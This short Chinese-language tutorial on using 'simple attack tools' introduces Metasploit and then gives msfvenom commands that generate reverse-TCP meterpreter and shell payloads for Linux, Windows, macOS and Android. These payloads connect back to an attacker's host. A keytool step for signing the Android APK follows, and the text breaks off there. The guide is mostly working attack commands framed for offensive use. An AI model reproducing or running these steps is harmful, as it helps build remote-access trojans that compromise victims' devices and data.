简单攻击工具的使用方法
1.metasploit 进行渗透
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和 IT 专业人士识别 安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真 正的安全风险情报。这些功能包括智能开发,代码审计,Web 应用程序扫描,社 会工程等。它允许开发者开发自己的漏洞脚本,并进行测试。
下载链接:https://www.rapid7.com/products/metasploit/download/
使用平台:windows、linux
可攻击设备类型:windows、mac、linux、android
1.1 使用步骤
生成 tcp 负载
inux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=<Port > -f elf > shell.elf
windows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=<Port > -f exe > shell.exe
mac:msfvenom -p osx/x86/shell_reverse_tcp LHOST=< IP Address> LPORT=<Port > -f macho > shell.macho
android:msfvenom -p android/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=<Port > R > E:apk.apk
以安卓为例
生成 apk 签名
在 JavaJdk bin 目录下 cmd 输入: keytool -genkey -alias suibian.keystore -keyalg RSA -validity 3650 -keystore suibian.keystore
。。。